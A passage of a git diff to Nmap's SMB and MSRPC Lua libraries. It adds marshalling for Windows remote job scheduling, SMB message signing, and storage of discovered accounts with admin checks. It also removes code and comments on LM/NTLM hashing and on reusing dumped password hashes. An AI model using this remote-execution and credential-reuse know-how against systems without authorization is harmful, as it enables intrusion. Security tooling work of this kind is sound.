+	pos, result['check_point']       = unmarshall_int32(data, pos)
+	pos, result['wait_hint']         = unmarshall_int32(data, pos)
+
+    return pos, result
+end
+
+
+
+local atsvc_DaysOfMonth = 
+{
+	First           =       0x00000001,
+	Second          =       0x00000002,
+	Third           =       0x00000004,
+	Fourth          =       0x00000008,
+	Fifth           =       0x00000010,
+	Sixth           =       0x00000020,
+	Seventh         =       0x00000040,
+	Eight           =       0x00000080,
+	Ninth           =       0x00000100,
+	Tenth           =       0x00000200,
+	Eleventh        =       0x00000400,
+	Twelfth         =       0x00000800,
+	Thitteenth      =       0x00001000,
+	Fourteenth      =       0x00002000,
+	Fifteenth       =       0x00004000,
+	Sixteenth       =       0x00008000,
+	Seventeenth     =       0x00010000,
+	Eighteenth      =       0x00020000,
+	Ninteenth       =       0x00040000,
+	Twentyth        =       0x00080000,
+	Twentyfirst     =       0x00100000,
+	Twentysecond    =       0x00200000,
+	Twentythird     =       0x00400000,
+	Twentyfourth    =       0x00800000,
+	Twentyfifth     =       0x01000000,
+	Twentysixth     =       0x02000000,
+	Twentyseventh   =       0x04000000,
+	Twentyeighth    =       0x08000000,
+	Twentyninth     =       0x10000000,
+	Thirtieth       =       0x20000000,
+	Thirtyfirst     =       0x40000000
+}
+
+---Marshall a <code>atsvc_DaysOfMonth</code>. This datatype is tied to the table above with that 
+-- name. 
+--
+--@param flags The value to marshall, as a string
+--@return The marshalled integer representing the given value, or <code>nil</code> if it wasn't 
+--        found. 
+function marshall_atsvc_DaysOfMonth(flags)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering marshall_atsvc_DaysOfMonth()"))
+
+	result = marshall_Enum32(flags, atsvc_DaysOfMonth)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving marshall_atsvc_DaysOfMonth()"))
+	return result
+end
+
+
+local atsvc_Flags =
+{
+	JOB_RUN_PERIODICALLY    = 0x01,
+	JOB_EXEC_ERROR          = 0x02,
+	JOB_RUNS_TODAY          = 0x04,
+	JOB_ADD_CURRENT_DATE    = 0x08,
+	JOB_NONINTERACTIVE      = 0x10
+}
+---Marshall a <code>atsvc_Flags</code>. This datatype is tied to the table above with that 
+-- name. 
+--
+--@param flags The value to marshall, as a string
+--@return The marshalled integer representing the given value, or <code>nil</code> if it wasn't 
+--        found. 
+function marshall_atsvc_Flags(flags)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering marshall_atsvc_Flags()"))
+
+	result = marshall_Enum8(flags, atsvc_Flags, false)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving marshall_atsvc_Flags()"))
+	return result
+end
+
+
+local atsvc_DaysOfWeek = 
+{
+	DAYSOFWEEK_MONDAY    = 0x01,
+	DAYSOFWEEK_TUESDAY   = 0x02,
+	DAYSOFWEEK_WEDNESDAY = 0x04,
+	DAYSOFWEEK_THURSDAY  = 0x08,
+	DAYSOFWEEK_FRIDAY    = 0x10,
+	DAYSOFWEEK_SATURDAY  = 0x20,
+	DAYSOFWEEK_SUNDAY    = 0x40
+}
+---Marshall a <code>atsvc_DaysOfWeek</code>. This datatype is tied to the table above with that 
+-- name. 
+--
+--@param flags The value to marshall, as a string
+--@return The marshalled integer representing the given value, or <code>nil</code> if it wasn't 
+--        found. 
+function marshall_atsvc_DaysOfWeek(flags)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering marshall_atsvc_DaysOfWeek()"))
+
+	result = marshall_Enum8(flags, atsvc_DaysOfWeek, false)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving marshall_atsvc_DaysOfWeek()"))
+	return result
+end
+
+---Marshall a JobInfo struct. The structure is as follows:
+--
+--<code>
+--    typedef struct {
+--        uint32 job_time;
+--        atsvc_DaysOfMonth days_of_month;
+--        atsvc_DaysOfWeek days_of_week;
+--        atsvc_Flags flags;
+--        [string,charset(UTF16)] uint16 *command;
+--    } atsvc_JobInfo;
+--</code>
+--
+--@param command The command to run. This has to be just the command, no parameters; if a 
+--               program requires parameters, then the best way to run it is through a batch
+--               file. 
+--@param time The time at which to run the job, in milliseconds from midnight. 
+function marshall_atsvc_JobInfo(command, time)
+	local result = ""
+
+	result = result .. marshall_int32(time)                       -- Job time
+	result = result .. marshall_int32(0)                          -- Day of month
+	result = result .. marshall_int8(0, false)                    -- Day of week
+io.write("Length = " .. #result .. "\n")
+	result = result .. marshall_atsvc_Flags("JOB_NONINTERACTIVE") -- Flags
+io.write("Length = " .. #result .. "\n\n\n")
+	result = result .. marshall_int16(0, false)                   -- Padding
+	result = result .. marshall_unicode_ptr(command, true)        -- Command
+
+	return result
+end
+
 
 
diff --git a/nselib/netbios.lua b/nselib/netbios.lua
index 43270af8b..bae98457b 100644
--- a/nselib/netbios.lua
+++ b/nselib/netbios.lua
@@ -255,10 +255,10 @@ function do_nbstat(host)
 	local encoded_name = name_encode("*")
 	local statistics
 
-	stdnse.print_debug(1, "Performing nbstat on host '%s'", host)
+	stdnse.print_debug(3, "Performing nbstat on host '%s'", host)
 	-- Check if it's cased in the registry for this host
 	if(nmap.registry["nbstat_names_" .. host] ~= nil) then
-		stdnse.print_debug(1, " |_ [using cached value]")
+		stdnse.print_debug(3, " |_ [using cached value]")
 		return true, nmap.registry["nbstat_names_" .. host], nmap.registry["nbstat_statistics_" .. host]
 	end
 
diff --git a/nselib/nsedebug.lua b/nselib/nsedebug.lua
index 885ea9cf6..823a44b52 100644
--- a/nselib/nsedebug.lua
+++ b/nselib/nsedebug.lua
@@ -27,7 +27,7 @@ function tostr(data, indent)
 
 	-- Check the type
 	if(type(data) == "nil") then
-		str = str .. (" "):rep(indent) .. data .. "\n"
+		str = str .. (" "):rep(indent) .. "nil\n"
 	elseif(type(data) == "string") then
 		str = str .. (" "):rep(indent) .. data .. "\n"
 	elseif(type(data) == "number") then
diff --git a/nselib/smb.lua b/nselib/smb.lua
index 85e36004a..f4f8071fe 100644
--- a/nselib/smb.lua
+++ b/nselib/smb.lua
@@ -1,21 +1,25 @@
---- Server Message Block (SMB, also known as CIFS) traffic.
+---Implements functionality related to Server Message Block (SMB, also known 
+-- as CIFS) traffic, which is a Windows protocol.
 --
--- SMB traffic is normally sent to/from ports 139 or 445 of Windows systems, some of them
--- properly and many of them not. Samba implements it, as do many printers and other embedded
--- devices. Although the protocol has been documented decently well by Samba and others, 
--- many 3rd party implementations are broken or make assumptions. 
+-- SMB traffic is normally sent to/from ports 139 or 445 of Windows systems. Other systems
+-- implement SMB as well, including Samba and a lot of embedded devices. Some of them implement
+-- it properly and many of them not. Although the protocol has been documented decently 
+-- well by Samba and others, many 3rd party implementations are broken or make assumptions. 
+-- Even Samba's and Windows' implementations aren't completely compatiable. As a result, 
+-- creating an implementation that accepts everything is a bit of a minefield. 
 --
--- Naturally, I do the same; however, that being said, this has been tested against every
--- broken implementation we could find, and will accept (or fail gracefully) against any 
--- bad implementations we could find. 
+-- Where possible, this implementation, since it's intended for scanning, will attempt to 
+-- accept any invalid implementations it can, and fail gracefully if it can't. This has
+-- been tested against a great number of weird implementations, and it now works against 
+-- all of them. 
 --
 -- The intention of this library is to eventually handle all aspects of the SMB protocol.
--- That being said, I'm only implementing the pieces that I find myself needing. If you 
+-- That being said, I'm only implementing the pieces that I (Ron Bowes) need. If you 
 -- require something more, let me know and I'll put it on my todo list. 
 --
--- A programmer using this library must already have some knowledge of the SMB protocol, 
--- although a lot isn't necessary. You can pick up a lot by looking at the code that uses
--- this. The basic login/logoff is this:
+-- A programmer using this library should already have some knowledge of the SMB protocol, 
+-- although a lot isn't necessary. You can pick up a lot by looking at the code. The basic
+-- login/logoff is this:
 --
 --<code>
 -- [connect]
@@ -30,6 +34,7 @@
 -- S->C SMB_COM_TREE_DISCONNECT
 -- C->S SMB_COM_LOGOFF_ANDX
 -- S->C SMB_COM_LOGOFF_ANDX
+-- [disconnect]
 --</code>
 --
 -- In terms of functions here, the protocol is:
@@ -61,76 +66,53 @@
 -- "NT LM 0.12", which is the most commonly supported one. Among other things, the server's 
 -- response contains the host's security level, the system time, and the computer/domain name. 
 -- Some systems will refuse to use that protocol and return "-1" or "1" instead of 0. If that's 
--- detected, we kill the connection (because the protocol following will be unexpected). 
+-- detected, we kill the connection (because the protocol following won't work). 
 --
 -- If that's successful, <code>SMB_COM_SESSION_SETUP_ANDX</code> is sent. It is essentially the logon
 -- packet, where the username, domain, and password are sent to the server for verification. 
 -- The username and password are generally picked up from the program parameters, which are
--- set when running a script, or from the registry (<code>nmap.registry[<ip>]['smbaccounts'])
--- where it can be set by other scripts (for example, smb-brute.nse). However, they can also 
--- be passed as parameters to the function, which will override any other username/password set. 
+-- set when running a script, or from the registry where it can be set by other scripts (for 
+-- example, <code>smb-brute.nse</code>). However, they can also be passed as parameters to the 
+-- function, which will override any other username/password set. 
 --
--- If a username is set without a password, then a NULL session is started. If a login fails,
--- we attempt to log in as the 'GUEST' account with a blank password. If that fails, we try
--- setting up a NULL session. Starting a NULL session will always work, but we may not get
--- any further (<code>tree_connect</code> might fail). 
+-- If a username and password are set, they are used for the first login attempt. If a login fails,
+-- or they weren't set, a connection as the 'GUEST' account with a blank password is attempted. If
+-- that fails, then a NULL session is established, which should always work. The username/password
+-- will give the highest access level, GUEST will give lower access, and NULL will give the lowest
+-- (often, NULL will give no access). 
 --
--- In terms of the login protocol, by default, we sent only NTLMv1 authentication, Lanman
--- isn't sent at all. The reason for this is, NTLMv2 isn't supported by every system (and I 
--- don't know how to do message signing on the v2 protocols), and doesn't have a significant security
--- advantage over NTLMv1 for performing single scans (the major change in NTLMv2 is incorporating 
--- a client challenge). Lanman is somewhat insecure, though, so I don't send it at all. These options 
--- can, however, be overridden either through script parameters or registry settings.
---
--- Lanman v1 is a fairly weak protocol, although it's still fairly difficult to break. NTLMv1 is a slightly more secure
--- protocol (although not much) -- it's also fairly difficult to reverse, though. Windows clients, by default send LMv1 and
--- NTLMv1 together, but every modern Windows server will accept NTLM alone, so I opted to use that. LMv2 and NTLMv2 are
--- slightly more secure, and they let the client specify random data (to help fight malicious servers with pre-
--- generated tables). LMv2 and NTLMv2 are identical, except that NTLMv2 has a longer client challenge. LMv2 can be sent
--- alone, but NTLMv2 can't.
---
--- Another interesting aspect of the password hashing is that the original password isn't even necessary, the
--- password's hash can be used instead. This hash can be dumped from memory of a live system by tools such as
--- pwdump and fgdump, or read straight from the SAM file (maybe some day, I'll do an Nmap script to dump it). 
--- This means that if a password file is recovered, it doesn't even need to be cracked before it can be used here.
+-- The actual login protocol used by <code>SMB_COM_SESSION_SETUP_ANDX</code> is explained in detail
+-- in <code>smbauth.lua</code>. 
 --
 -- Thanks go to Christopher R. Hertel and his book Implementing CIFS, which 
 -- taught me everything I know about Microsoft's protocols. Additionally, I used Samba's
--- list of error codes for my constants, although I don't believe they would be covered
+-- list of error codes for my constants. Although I don't believe they would be covered
 -- by GPL, since they're public now anyways, but I'm not a lawyer and, if somebody feels
 -- differently, let me know and we can sort this out. 
 --
--- Scripts that use this module can use the script arguments
--- <code>smbusername</code>, <code>smbpassword</code>, <code>smbhash</code>,
+-- Scripts that use this module can use the script arguments listed below
 -- example of using these script arguments:
 -- <code>
--- nmap --script=smb-<script>.nse --script-args=smbuser=ron,smbpass=iagotest2k3 <host>
+-- nmap --script=smb-<script>.nse --script-args=smbuser=ron,smbpass=iagotest2k3,smbbasic=1,smbsign=force <host>
 -- </code>
 -- 
---@args  smbusername The SMB username to log in with. The forms "DOMAIN\username" and "username@DOMAIN"
---                   are not understood. To set a domain, use the <code>smbdomain</code> argument. 
---@args  smbdomain   The domain to log in with. If you aren't in a domained environment, then anything
---                   will (should?) be accepted by the server. 
---@args  smbpassword The password to connect with. Be cautious with this, since some servers will lock
---                   accounts if the incorrect password is given. Although it's rare that the
---                   Administrator account can be locked out, in the off chance that it can, you could
---                   get yourself in trouble. 
---@args  smbhash     A password hash to use when logging in. This is given as a single hex string (32
---                   characters) or a pair of hex strings (both 32 characters, optionally separated by a 
---                   single character). These hashes are the LanMan or NTLM hash of the user's password,
---                   and are stored on disk or in memory. They can be retrieved from memory
---                   using the fgdump or pwdump tools. 
---@args  smbtype     The type of SMB authentication to use. These are the possible options:
--- * <code>v1</code>: Sends LMv1 and NTLMv1.
--- * <code>LMv1</code>: Sends LMv1 only.
--- * <code>NTLMv1</code>: Sends NTLMv1 only (default).
--- * <code>v2</code>: Sends LMv2 and NTLMv2.
--- * <code>LMv2</code>: Sends LMv2 only.
---                   The default, <code>NTLMv1</code>, is a pretty
---                   decent compromise between security and compatibility. If you are paranoid, you might 
---                   want to use <code>v2</code> or <code>lmv2</code> for this. (Actually, if you're paranoid, you should be 
---                   avoiding this protocol altogether :P). If you're using an extremely old system, you 
---                   might need to set this to <code>v1</code> or <code>lm</code>, which are less secure but more compatible. 
+--@args  smbbasic    Forces the authentication to use basic security, as opposed to "extended security". 
+--                   Against most modern systems, extended security should work, but there may be cases
+--                   where you want to force basic. There's a chance that you'll get better results for 
+--                   enumerating users if you turn on basic authentication. 
+--@args smbsign      Controls whether or not server signatures are checked in SMB packets. By default, on Windows,
+--                   server signatures aren't enabled or required. By default, this library will always sign 
+--                   packets if it knows how, and will check signatures if the server says to. Possible values are:
+-- * <code>force<code>:      Always check server signatures, even if server says it doesn't support them (will 
+--                           probably fail, but is technically more secure). 
+-- * <code>negotiate</code>: [default] Use signatures if server supports them. 
+-- * <code>ignore</code>:    Never check server signatures. Not recommended. 
+-- * <code>disable</code>:   Don't send signatures, at all, and don't check the server's. not recommended. 
+--                   More information on signatures can be found in <code>smbauth.lua</code>.
+--@args smbport      Override the default port choice. If <code>smbport</code> is open, it's used. It's assumed
+--                   to be the same protocol as port 445, not port 139. Since it probably isn't possible to change
+--                   Windows' ports normally, this is mostly useful if you're bouncing through a relay or something. 
+--                   
 --@author Ron Bowes <ron@skullsecurity.net>
 --@copyright Same as Nmap--See http://nmap.org/book/man-legal.html
 -----------------------------------------------------------------------
@@ -139,8 +121,9 @@ module(... or "smb", package.seeall)
 require 'bit'
 require 'bin'
 require 'netbios'
+require 'nsedebug'
+require 'smbauth'
 require 'stdnse'
-have_ssl = (nmap.have_ssl() and pcall(require, "openssl"))
 
 -- These arrays are filled in with constants at the bottom of this file
 command_codes = {}
@@ -249,6 +232,16 @@ function get_port(host)
 	local port_u137 = nmap.get_port_state(host, {number=137, protocol="udp"})
 	local port_t139 = nmap.get_port_state(host, {number=139, protocol="tcp"})
 	local port_t445 = nmap.get_port_state(host, {number=445, protocol="tcp"})
+	local custom_port = nil
+
+	if(nmap.registry.args.smbport ~= nil) then
+		custom_port = nmap.get_port_state(host, {number=tonumber(nmap.registry.args.smbport), protocol="tcp"})
+	end
+
+	-- Try a user-defined port first
+	if(custom_port ~= nil and custom_port.state == "open") then
+		return custom_port.number
+	end
 
 	if(port_t445 ~= nil and port_t445.state == "open") then
 		 -- tcp/445 is open, we're good
@@ -270,7 +263,7 @@ end
 --@param string The base string. 
 --@param blank  The string to return if <code>string</code> was blank
 --@return Either <code>string</code> or, if it was blank, <code>blank</code>
-function string_or_blank(string, blank)
+local function string_or_blank(string, blank)
 	if(string == nil or string == "") then
 		if(blank == nil) then
 			return "<blank>"
@@ -282,6 +275,77 @@ function string_or_blank(string, blank)
 	end
 end
 
+---Turn off extended security negotiations for this connection. There are a few reasons you might want to
+-- do that, the main ones being that extended security is going to be marginally slower and it's not going
+-- to give the same level of information in some cases (namely, it doesn't present the server's name). 
+--@param smb The SMB state table. 
+function disable_extended(smb)
+	smb['extended_security'] = false
+end
+
+---Writes the given account to the registry. There are several places where accounts are stored:
+-- * registry['usernames'][username]        => true
+-- * registry['smbaccounts'][username]      => password
+-- * registry[ip]['smbaccounts'][username]  => password
+-- * registry[ip]['smbaccount']['username'] => username
+-- * registry[ip]['smbaccount']['password'] => password
+-- * registry[ip]['smbaccount']['is_admin'] => true or false
+--
+-- The final place, 'smbaccount', is reserved for the "best" account. This is an administrator
+-- account, if one's found; otherwise, it's the first account discovered that isn't <code>guest</code>. 
+--
+-- This has to be called while no SMB connections are made, since it potentially makes its own connection.
+--
+--@param ip       The ip address of the host
+--@param username The username to add. 
+--@param password The password to add. 
+function add_account(host, username, password)
+	local best_account = false
+
+	-- Save the username in a global list
+	if(nmap.registry.usernames == nil) then
+		nmap.registry.usernames = {}
+	end
+	nmap.registry.usernames[username] = true
+
+	-- Save the username/password pair in a global list
+	if(nmap.registry.smbaccounts == nil) then
+		nmap.registry.smbaccounts = {}
+	end
+	nmap.registry.smbaccounts[username] = password
+
+	-- Save the username/password pair for the server with the others
+	if(nmap.registry[host.ip] == nil) then
+		nmap.registry[host.ip] = {}
+	end
+	if(nmap.registry[host.ip]['smbaccounts'] == nil) then
+		nmap.registry[host.ip]['smbaccounts'] = {}
+	end
+	nmap.registry[host.ip]['smbaccounts'][username] = password
+
+	-- Don't bother saving if our account is guest or blank (those are tried anyways)
+	if(string.lower(username) ~= "guest" and string.lower(username) ~= "") then
+		-- Save the new account if this is our first one, or our other account isn't an admin
+		if(nmap.registry[host.ip]['smbaccount'] == nil or nmap.registry[host.ip]['smbaccount']['is_admin'] == false) then
+			local result
+	
+			nmap.registry[host.ip]['smbaccount'] = {}
+			nmap.registry[host.ip]['smbaccount']['username'] = username
+			nmap.registry[host.ip]['smbaccount']['password'] = password
+	
+			-- Try getting information about "IPC$". This determines whether or not the user is administrator
+			-- since only admins can get share info. 
+			nmap.registry[host.ip]['smbaccount']['is_admin'], _ = msrpc.get_share_info(host, "IPC$")
+	
+			if(nmap.registry[host.ip]['smbaccount']['is_admin'] == true) then
+				stdnse.print_debug(1, "SMB: Saved an administrative account: %s", username)
+			else
+				stdnse.print_debug(1, "SMB: Saved a non-administrative account: %s", username)
+			end
+		end
+	end
+end
+
 --- Begins a SMB session, automatically determining the best way to connect. Also starts a mutex
 --  with mutex_id. This prevents multiple threads from making queries at the same time (which breaks
 --  SMB). 
@@ -294,9 +358,17 @@ function start(host)
 	local status, result
 	local state = {}
 
-	state['uid']  = 0
-	state['tid']  = 0
-	state['ip']   = host.ip
+	state['uid']      = 0
+	state['tid']      = 0
+	state['ip']       = host.ip
+	state['sequence'] = -1
+
+	-- Check whether or not the user requested basic authentication
+	if(nmap.registry.args.smbbasic == nil) then
+		state['extended_security'] = true
+	else
+		state['extended_security'] = false
+	end
 
 	-- Store the name of the server
 	status, result = netbios.get_server_name(host.ip)
@@ -312,9 +384,9 @@ function start(host)
 
 	lock_mutex(state, "start(1)")
 
-	if(port == 445) then
+	if(port ~= 139) then
 		status, state['socket'] = start_raw(host, port)
-		state['port'] = 445
+		state['port'] = port
 
 		if(status == false) then
 			unlock_mutex(state, "start(1)")
@@ -322,9 +394,9 @@ function start(host)
 		end
 		return true, state
 
-	elseif(port == 139) then
+	else
 		status, state['socket'] = start_netbios(host, port)
-		state['port'] = 139
+		state['port'] = port
 		if(status == false) then
 			unlock_mutex(state, "start(2)")
 			return false, state['socket']
@@ -338,6 +410,76 @@ function start(host)
 	return false, "SMB: Couldn't find a valid port to check"
 end
 
+---Initiates a SMB connection over whichever port it can, then optionally sends the common
+-- initialization packets. Note that each packet depends on the previous one, so if you want
+-- to go all the way up to create_file, you have to set all parameters. 
+--
+-- If anything fails, we back out of the connection and return an error, so the calling functino
+-- doesn't have to call smb.stop(). 
+--
+--@param host               The host object. 
+--@param negotiate_protocol [optional] If 'true', send the protocol negotiation. Default: false. 
+--@param start_session      [optional] If 'true', start the session. Default: false. 
+--@param tree_connect       [optional] The tree to connect to, if given (eg. "IPC$" or "C$"). If not given, 
+--                          packet isn't sent. 
+--@param create_file        [optional] The path and name of the file (or pipe) that's created, if given. If 
+--                          not given, packet isn't sent. 
+--@param disable_extended   [optional] If set to true, disables extended security negotiations. 
+function start_ex(host, negotiate_protocol, start_session, tree_connect, create_file, disable_extended)
+	local smbstate
+	local status, err
+
+	-- Begin the SMB session
+	status, smbstate = smb.start(host)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	-- Disable extended security if it was requested
+	if(disable_extended == true) then
+		smb.disable_extended(smbstate)
+	end
+
+	if(negotiate_protocol == true) then
+		-- Negotiate the protocol
+		status, err = smb.negotiate_protocol(smbstate)
+		if(status == false) then
+			smb.stop(smbstate)
+			return false, err
+		end
+
+		if(start_session == true) then	
+			-- Start up a session
+			status, err = smb.start_session(smbstate)
+			if(status == false) then
+				smb.stop(smbstate)
+				return false, err
+			end
+
+			if(tree_connect ~= nil) then
+				-- Connect to share
+				status, err = smb.tree_connect(smbstate, tree_connect)
+				if(status == false) then
+					smb.stop(smbstate)
+					return false, err
+				end
+
+				if(create_file ~= nil) then
+					-- Try to connect to requested pipe
+					status, err = smb.create_file(smbstate, create_file)
+					if(status == false) then
+						smb.stop(smbstate)
+						return false, err
+					end
+				end
+			end
+		end
+	end
+
+	-- Return everything
+	return true, smbstate
+end
+
 --- Kills the SMB connection, closes the socket, and releases the mutex. Because of the mutex 
 --  being released, a script HAS to call <code>stop</code> before it exits, no matter why it's exiting! 
 --
@@ -537,179 +679,6 @@ function start_netbios(host, port, name)
 	return false, "SMB: Couldn't find a NetBIOS name that works for the server. Sorry!"
 end
 
----Generate the Lanman v1 hash (LMv1). The generated hash is incredibly easy to reverse, because the input
--- is padded or truncated to 14 characters, then split into two 7-character strings. Each of these strings
--- are used as a key to encrypt the string, "KGS!@#$%" in DES. Because the keys are no longer than 
--- 7-characters long, it's pretty trivial to bruteforce them. 
---
---@param password the password to hash
---@return (status, hash) If status is true, the hash is returned; otherwise, an error message is returned.
-function lm_create_hash(password)
-	if(have_ssl ~= true) then
-		return false, "SMB: OpenSSL not present"
-	end
-
-	local str1, str2
-	local key1, key2
-	local result
-
-	-- Convert the password to uppercase
-	password = string.upper(password)
-
-	-- If password is under 14 characters, pad it to 14
-	if(#password < 14) then
-		password = password .. string.rep(string.char(0), 14 - #password)
-	end
-
-	-- Take the first and second half of the password (note that if it's longer than 14 characters, it's truncated)
-	str1 = string.sub(password, 1, 7)
-	str2 = string.sub(password, 8, 14)
-
-	-- Generate the keys
-	key1 = openssl.DES_string_to_key(str1)
-	key2 = openssl.DES_string_to_key(str2)
-
-	-- Encrypt the string "KGS!@#$%" with each half, and concatenate it
-	result = openssl.encrypt("DES", key1, nil, "KGS!@#$%") .. openssl.encrypt("DES", key2, nil, "KGS!@#$%")
-
-	return true, result
-end
-
----Generate the NTLMv1 hash. This hash is quite a bit better than LMv1, and is far easier to generate. Basically,
--- it's the MD4 of the Unicode password. 
---
---@param password the password to hash
---@return (status, hash) If status is true, the hash is returned; otherwise, an error message is returned.
-function ntlm_create_hash(password)
-	if(have_ssl ~= true) then
-		return false, "SMB: OpenSSL not present"
-	end
-
-	local i
-	local unicode = ""
-
-	for i = 1, #password, 1 do
-		unicode = unicode .. bin.pack("<S", string.byte(password, i))
-	end
-
-	return true, openssl.md4(unicode)
-end
-
----Create the Lanman response to send back to the server. To do this, the Lanman password is padded to 21 
--- characters and split into three 7-character strings. Each of those strings is used as a key to encrypt
--- the server challenge. The three encrypted strings are concatenated and returned. 
---
---@param lanman    The LMv1 hash
---@param challenge The server's challenge. 
---@return (status, response) If status is true, the response is returned; otherwise, an error message is returned.
-function lm_create_response(lanman, challenge)
-	if(have_ssl ~= true) then
-		return false, "SMB: OpenSSL not present"
-	end
-
-	local str1, str2, str3
-	local key1, key2, key3
-	local result
-
-	-- Pad the hash to 21 characters
-	lanman = lanman .. string.rep(string.char(0), 21 - #lanman)
-
-	-- Take the first and second half of the password (note that if it's longer than 14 characters, it's truncated)
-	str1 = string.sub(lanman, 1,  7)
-	str2 = string.sub(lanman, 8,  14)
-	str3 = string.sub(lanman, 15, 21)
-
-	-- Generate the keys
-	key1 = openssl.DES_string_to_key(str1)
-	key2 = openssl.DES_string_to_key(str2)
-	key3 = openssl.DES_string_to_key(str3)
-
-	-- Encrypt the challenge with each key
-	result = openssl.encrypt("DES", key1, nil, challenge) .. openssl.encrypt("DES", key2, nil, challenge) .. openssl.encrypt("DES", key3, nil, challenge) 
-
-	return true, result
-end
-
----Create the NTLM response to send back to the server. This is actually done the exact same way as the Lanman hash,
--- so I call the <code>Lanman</code> function. 
---
---@param ntlm      The NTLMv1 hash
---@param challenge The server's challenge. 
---@return (status, response) If status is true, the response is returned; otherwise, an error message is returned.
-function ntlm_create_response(ntlm, challenge)
-	return lm_create_response(ntlm, challenge)
-end
-
----Create the NTLMv2 hash, which is based on the NTLMv1 hash (for easy upgrading), the username, and the domain. 
--- Essentially, the NTLM hash is used as a HMAC-MD5 key, which is used to hash the unicode domain concatenated 
--- with the unicode username. 
---
---@param ntlm     The NTLMv1 hash. 
---@param username The username we're using. 
---@param domain   The domain. 
---@return (status, response) If status is true, the response is returned; otherwise, an error message is returned.
-function ntlmv2_create_hash(ntlm, username, domain)
-	if(have_ssl ~= true) then
-		return false, "SMB: OpenSSL not present"
-	end
-
-	local unicode = ""
-
-	username = string.upper(username)
-	domain   = string.upper(domain)
-
-	for i = 1, #username, 1 do
-		unicode = unicode .. bin.pack("<S", string.byte(username, i))
-	end
-
-	for i = 1, #domain, 1 do
-		unicode = unicode .. bin.pack("<S", string.byte(domain, i))
-	end
-
-	return true, openssl.hmac("MD5", ntlm, unicode)
-end
-
----Create the LMv2 response, which can be sent back to the server. This is identical to the <code>NTLMv2</code> function, 
--- except that it uses an 8-byte client challenge. 
---
--- The reason for LMv2 is a long and twisted story. Well, not really. The reason is basically that the v1 hashes
--- are always 24-bytes, and some servers expect 24 bytes, but the NTLMv2 hash is more than 24 bytes. So, the only
--- way to keep pass-through compatibility was to have a v2-hash that was guaranteed to be 24 bytes. So LMv1 was
--- born -- it has a 16-byte hash followed by the 8-byte client challenge, for a total of 24 bytes. And now you've
--- learned something
---
---@param ntlm      The NVLMv1 hash.
---@param username  The username we're using. 
---@param domain    The domain. 
---@param challenge The server challenge. 
---@return (status, response) If status is true, the response is returned; otherwise, an error message is returned.
-function lmv2_create_response(ntlm, username, domain, challenge)
-	return ntlmv2_create_response(ntlm, username, domain, challenge, 8)
-end
-
----Create the NTLMv2 response, which can be sent back to the server. This is done by using the HMAC-MD5 algorithm
--- with the NTLMv2 hash as a key, and the server challenge concatenated with the client challenge for the data. 
--- The resulting hash is concatenated with the client challenge and returned.
---
--- The "proper" implementation for this uses a certain structure for the client challenge, involving the time
--- and computer name and stuff (if you don't do this, Wireshark tells you it's a malformed packet). In my tests, 
--- however, I couldn't get Vista to recognize a client challenge longer than 24 bytes, and this structure was
--- guaranteed to be much longer than 24 bytes. So, I just use a random string generated by OpenSSL. I've tested
--- it on every Windows system from Windows 2000 to Windows Vista, and it has always worked. 
-function ntlmv2_create_response(ntlm, username, domain, challenge, client_challenge_length)
-	if(have_ssl ~= true) then
-		return false, "SMB: OpenSSL not present"
-	end
-
-	local client_challenge = openssl.rand_bytes(client_challenge_length)
-	local ntlmv2_hash
-
-	status, ntlmv2_hash = ntlmv2_create_hash(ntlm, username, domain)
-
-	return true, openssl.hmac("MD5", ntlmv2_hash, challenge .. client_challenge) .. client_challenge
-end
-
-
 --- Creates a string containing a SMB packet header. The header looks like this:
 -- 
 --<code>
@@ -752,7 +721,17 @@ local function smb_encode_header(smb, command)
 	local flags  = bit.bor(0x10, 0x08) -- SMB_FLAGS_CANONICAL_PATHNAMES | SMB_FLAGS_CASELESS_PATHNAMES
 	-- These flags are less deprecated. We negotiate 32-bit status codes and long names. We also don't include Unicode, which tells
 	-- the server that we deal in ASCII. 
-	local flags2 = bit.bor(0x4000, 0x0040, 0x0001) -- SMB_FLAGS2_32BIT_STATUS | SMB_FLAGS2_IS_LONG_NAME | SMB_FLAGS2_KNOWS_LONG_NAMES
+	local flags2 = bit.bor(0x4000, 0x2000, 0x0040, 0x0001) -- SMB_FLAGS2_32BIT_STATUS | SMB_FLAGS2_EXECUTE_ONLY_READS | SMB_FLAGS2_IS_LONG_NAME | SMB_FLAGS2_KNOWS_LONG_NAMES
+
+	-- Unless the user's disabled the security signature, add it
+	if(nmap.registry.args.smbsign ~= "disable") then
+		flags2 = bit.bor(flags2, 0x0004) -- SMB_FLAGS2_SECURITY_SIGNATURE
+	end
+		
+
+	if(smb['extended_security'] == true) then
+		flags2 = bit.bor(flags2, 0x0800) -- SMB_EXTENDED_SECURITY
+	end
 
 	-- TreeID should never ever be 'nil', but it seems to happen once in awhile so print an error
 	if(smb['tid'] == nil) then
@@ -804,6 +783,68 @@ local function smb_encode_data(data)
 	return bin.pack("<SA", string.len(data), data)
 end
 
+---Sign the message, if possible. This is done by replacing the signature with the sequence
+-- number, creating a hash, then putting that hash in the signature location. 
+--@param smb  The smb state object.
+--@param body The body of the packet that's being signed.
+--@return The body of the packet, with the signature in place.
+local function message_sign(smb, body)
+	smb['sequence'] = smb['sequence'] + 1
+
+	if(smb['mac_key'] == nil) then
+		stdnse.print_debug(3, "SMB: Not signing message (missing mac_key)")
+		return body
+	elseif(nmap.registry.args.smbsign == "disable") then
+		stdnse.print_debug(3, "SMB: Not signing message (disabled by user)")
+
+		return body
+	end
+
+	-- Convert the sequence number to a string
+	local sequence = bin.pack("<L", smb['sequence'])
+	-- Create a new string, with the sequence number in place
+	local new_packet = string.sub(body, 1, 14) .. sequence .. string.sub(body, 23)
+	-- Calculate the signature
+	local signature = smbauth.calculate_signature(smb['mac_key'], new_packet)
+
+	return string.sub(body, 1, 14) .. signature .. string.sub(body, 23)
+end
+
+---Check the signature of the message. This is the opposite of <code>message_sign</code>, 
+-- and works the same way (replaces the signature with the sequence number, calculates
+-- hash, checks)
+--@param smb  The smb state object.
+--@param body The body of the packet that's being checked. 
+--@return A true/false value -- true if the packet was signed properly, false if it wasn't. 
+local function message_check_signature(smb, body)
+	smb['sequence'] = smb['sequence'] + 1
+
